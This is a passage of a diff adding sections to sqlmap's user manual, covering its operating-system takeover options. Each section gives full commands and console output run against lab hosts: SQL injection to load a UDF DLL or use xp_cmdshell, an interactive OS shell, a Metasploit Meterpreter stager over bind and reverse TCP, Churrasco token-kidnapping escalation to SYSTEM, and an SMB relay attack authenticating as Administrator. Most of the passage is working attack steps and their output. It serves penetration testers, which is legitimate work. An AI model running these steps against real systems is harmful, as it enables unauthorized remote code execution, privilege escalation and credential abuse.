+[hh:mm:05] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:05] [INFO] detecting back-end DBMS version from its banner +[hh:mm:05] [INFO] retrieved: 8.3.5, +[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:16] [INFO] the back-end DBMS operating system is Windows +[hh:mm:16] [INFO] testing if current user is DBA +[hh:mm:16] [INFO] retrieved: 1 +[hh:mm:16] [INFO] checking if sys_exec UDF already exist +[hh:mm:16] [INFO] retrieved: 0 +[hh:mm:18] [INFO] checking if sys_eval UDF already exist +[hh:mm:18] [INFO] retrieved: 0 +[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file +do you want to retrieve the command standard output? [Y/n] +[hh:mm:35] [INFO] retrieved: w2k3dev\postgres +command standard output: 'w2k3dev\postgres' +
+
+

-

The techniques implemented are detailed on the white paper -Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-cmd "whoami" --union-use -v 1
+
+[...]
+[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
+technique
+[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name'
+[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' 
+by appending a false condition after the parameter value
+[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
+sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
+
+[hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:03] [INFO] testing if current user is DBA
+[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:09] [INFO] xp_cmdshell extended procedure is available
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:11] [INFO] the SQL query provided returns 1 entries
+command standard output:
+---
+nt authority\network service
+---
+
+
+

+ +

It is also possible to simulate a real shell where you can type as many +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities implemented for +--sql-shell.

+ +

Example on a MySQL 5.0.67 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-shell -v 2
+
+[...]
+[hh:mm:36] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:36] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:36] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32))
+[hh:mm:36] [INFO] retrieved: 5.0.67
+[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds
+[hh:mm:37] [DEBUG] query: SELECT SLEEP(5)
+[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
+[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32))
+[hh:mm:42] [INFO] retrieved: C
+[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:42] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:42] [DEBUG] cleaning up the database management system
+[hh:mm:42] [DEBUG] removing support tables
+[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:42] [INFO] testing if current user is DBA
+[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=
+(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END)
+[hh:mm:42] [INFO] retrieved: 1
+[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds
+[hh:mm:43] [INFO] checking if sys_exec UDF already exist
+[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
+CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) 
+THEN 1 ELSE 0 END)
+[hh:mm:43] [INFO] retrieved: 0
+[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:43] [INFO] checking if sys_eval UDF already exist
+[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
+CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) 
+THEN 1 ELSE 0 END)
+[hh:mm:43] [INFO] retrieved: 0
+[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique
+[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to
+[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob)
+[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value
+[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the 
+support table
+[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table
+[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
+[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...])
+[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...])
+[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] cleaning up the database management system
+[hh:mm:44] [DEBUG] removing support tables
+[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file
+[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec
+[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll'
+[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file
+[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval
+[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME 
+'libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] creating a support table to write commands standard output to
+[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput
+[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
+[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
+operating system command execution
+[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami'))
+[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM 
+sqlmapoutput
+[hh:mm:41] [INFO] retrieved: nt authority\system
+[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds
+[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput
+command standard output:    'nt authority\system'
+
+os-shell> [TAB TAB]
+copy         del          dir          echo         md           mem          move         
+net          netstat -na  ver          whoami       xcopy        
+
+os-shell> exit
+[hh:mm:51] [INFO] cleaning up the database management system
+[hh:mm:51] [DEBUG] removing support tables
+[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] n
+do you want to remove sys_eval UDF? [Y/n] n
+[hh:mm:04] [INFO] database management system cleanup finished
+[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system 
+can only be deleted manually
+
+
+

+ +

Now run it again, but specifying the --union-use to retrieve the +command standard output quicker, via UNION based SQL injection, when the +parameter is affected also by inband SQL injection vulnerability:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-shell -v 2 --union-use
+
+[...]
+[hh:mm:16] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
+technique
+[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
+[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
+vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
+NULL, NULL, NULL# AND 528=528'
+
+[hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:16] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:16] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
+MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173
+[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:16] [DEBUG] query: SELECT SLEEP(5)
+[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
+[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
+MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:21] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:21] [DEBUG] cleaning up the database management system
+[hh:mm:21] [DEBUG] removing support tables
+[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:21] [INFO] testing if current user is DBA
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE 
+WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 
+1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:21] [INFO] checking if sys_exec UDF already exist
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
+((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=
+CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
+AND 4900=4900
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+sys_exec UDF already exists, do you want to overwrite it? [y/N] n
+[hh:mm:24] [INFO] checking if sys_eval UDF already exist
+[hh:mm:24] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
+((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=
+CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
+AND 4437=4437
+[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds
+sys_eval UDF already exists, do you want to overwrite it? [y/N] n
+[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested
+[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested
+[hh:mm:25] [DEBUG] creating a support table to write commands standard output to
+[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput
+[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
+[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
+operating system command execution
+[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> ipconfig
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig'))
+[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST
+(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND 
+7106=7106
+[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput
+command standard output:
+---
+
+Windows IP Configuration
+
+
+Ethernet adapter Local Area Connection 2:
+
+   Connection-specific DNS Suffix  . : localdomain
+   IP Address. . . . . . . . . . . . : 192.168.1.121
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+---Default Gateway . . . . . . . . . : 192.168.1.1
+
+os-shell> exit
+[hh:mm:41] [INFO] cleaning up the database management system
+[hh:mm:41] [DEBUG] removing support tables
+[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] n
+do you want to remove sys_eval UDF? [Y/n] n
+[hh:mm:54] [INFO] database management system cleanup finished
+[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system 
+can only be deleted manually
+
+
+

+ +

As you can see from this second example, sqlmap firstly check if the two +user-defined functions are already created, if so, it asks the user if he +wants to recreate them or keep them and save time.

Prompt for an out-of-band shell, meterpreter or VNC

Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

-

TODO

+

It is possible to establish an out-of-band TCP stateful channel +between the attacker and the underlying operating system by using the +exploited SQL injection as a stepping stone. This is implemented for MySQL, +PostgreSQL and Microsoft SQL Server. +sqlmap relies on the +Metasploit to perform this attack, so you need to have it already +on your system: it's free and can be downloaded from the homepage. It is +advised to use Metasploit 3.3 development version from the subversion +repository.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a MySQL 5.0.67 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:17] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:17] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:17] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:17] [INFO] retrieved: 5.0.67
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:23] [INFO] retrieved: C
+[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:23] [INFO] testing if current user is DBA
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if sys_exec UDF already exist
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N
+[hh:mm:24] [INFO] checking if sys_eval UDF already exist
+[hh:mm:24] [INFO] retrieved: 1
+[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N
+[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager
+[hh:mm:24] [INFO] which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 1
+[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121
+[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588
+[hh:mm:24] [INFO] which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 1
+[hh:mm:24] [INFO] which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 11
+[hh:mm:24] [INFO] creation in progress .................. done
+[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1
+[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version 
+above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
+It might only slow down a bit the execution of sqlmap
+[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe'
+[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Please wait while we load the module tree...
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588)
+
+meterpreter > Loading extension priv...success.
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter
+Hardware MAC: 00:0c:29:29:ee:86
+IP Address  : 192.168.1.121
+Netmask     : 255.255.255.0
+
+
+meterpreter > pwd
+C:\Program Files\MySQL\MySQL Server 5.0\Data
+meterpreter > exit
+
+
+

+ +

By default MySQL on Windows runs as SYSTEM, however PostgreSQL +run as a low-privileged user postgres on both Windows and Linux. +Microsoft SQL Server 2000 by default runs as SYSTEM, whereas +Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK +SERVICE and sometimes as LOCAL SERVICE.

+

It is possible to provide sqlmap with the --priv-esc option to +abuse Windows access tokens and escalate privileges to SYSTEM +within the Meterpreter session created if the underlying operating system +is not patched against Microsoft Security Bulletin +MS09-012. +sqlmap performs the +Windows Token kidnapping +technique by uploading +Churrasco +local exploit and using it to call the Metasploit's payload stager +executable. sqlmap uses also the Metasploit's Meterpreter +incognito +extension to abused Windows access tokens in conjunction to Churrasco +stand-alone exploit if the user wants so.

+ +

Note that this feature is not supported by sqlmap installed from the +DEB package because it relies on Churrasco, which is not explicitly free +software so it has not been included in the package.

+ +

This technique is detailed on the white paper +Advanced SQL injection to operating system full control.

+ +

Example on a Microsoft SQL Server 2005 Service Pack 0 running as +NETWORK SERVICE on the target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
+
+[...]
+[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:17] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:22] [INFO] testing if current user is DBA
+[hh:mm:22] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:29] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager
+which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 3
+which is the local address? [192.168.1.161] 
+which local port numer do you want to use? [61499] 
+[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
+that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' 
+extension to privilege escalate
+which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 
+[hh:mm:58] [INFO] creation in progress .................. done
+[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1
+[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version 
+above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
+It might only slow down a bit the execution of sqlmap
+[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe'
+[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no 
+Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito 
+extension to fail to list tokens
+do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its 
+argument so that it will be started as SYSTEM? [Y/n] y
+[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into 
+chunks, upload them and recreate the original file out of the binary chunks server-side, 
+wait..
+[hh:mm:22] [INFO] file chunk 1 written
+[14:10:06] [INFO] file chunk 2 written
+[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[*] Please wait while we load the module tree...
+[*] Handler binding to LHOST 0.0.0.0
+[*] Started reverse handler
+[*] Starting the payload handler...
+[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
+
+meterpreter > 
+[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of 
+Access Tokens availables. Choose which user you want to impersonate by using incognito's 
+command 'impersonate_token'
+Loading extension priv...success.
+meterpreter > Loading extension incognito...success.
+meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+Delegation Tokens Available
+========================================
+NT AUTHORITY\LOCAL SERVICE
+NT AUTHORITY\NETWORK SERVICE
+NT AUTHORITY\SYSTEM
+W2K3DEV\Administrator
+W2K3DEV\IUSR_WIN2003
+W2K3DEV\postgres
+
+Impersonation Tokens Available
+========================================
+NT AUTHORITY\ANONYMOUS LOGON
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+
+

+

One click prompt for an out-of-band shell, meterpreter or VNC

Options: --os-smbrelay, --priv-esc and --msf-path

-

TODO

+

If the back-end database management system runs as Administrator +and the underlying operating system is not patched against Microsoft +Security Bulletin +MS08-068, +sqlmap can abuse the universal naming convention (UNC) supported within +all database management systems to force the database server to initiate a +SMB connection with the attacker host, then perform a SMB authentication +relay attack in order to establish a high-privileged out-of-band TCP +stateful channel between the attacker host and the target database +server. +sqlmap relies on +Metasploit's SMB relay exploit to perform this attack, so you need +to have it already on your system: it's free and can be downloaded from the +homepage. +You need to run sqlmap as root user if you want to perform a SMB +relay attack because it will need to listen on a user-specified SMB TCP +port for incoming connection attempts.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

This technique is detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 running as +Administrator on the target:

+

+

+
+$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:11] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often 
+Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not 
+send the NTLM session hash when connecting to a SMB service
+[hh:mm:16] [INFO] which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 1
+[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161
+[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131
+[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
+[hh:mm:16] [INFO] which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 1
+[hh:mm:16] [INFO] which SMB port do you want to use?
+[1] 139/TCP (default)
+[2] 445/TCP
+> 1
+[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait..
+
+                _                  _       _ _
+               | |                | |     (_) |
+ _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
+| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
+| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
+|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
+                            | |
+                            |_|
+
+
+       =[ msf v3.3-dev
++ -- --=[ 392 exploits - 234 payloads
++ -- --=[ 20 encoders - 7 nops
+       =[ 168 aux
+
+resource> use windows/smb/smb_relay
+resource> set SRVHOST 192.168.1.161
+SRVHOST => 192.168.1.161
+resource> set SRVPORT 139
+SRVPORT => 139
+resource> set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+resource> set LPORT 4907
+LPORT => 4907
+resource> set RHOST 192.168.1.131
+RHOST => 192.168.1.131
+resource> exploit
+[*] Exploit running as background job.
+msf exploit(smb_relay) > 
+[*] Started bind handler
+[*] Server started.
+[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+Service Pack 2 LM:
+[*] Sending Access Denied to 192.168.1.131:3242 \
+[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+Server 2003 3790 Service Pack 2 LM:
+[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] AUTHENTICATED as W2K3DEV\Administrator...
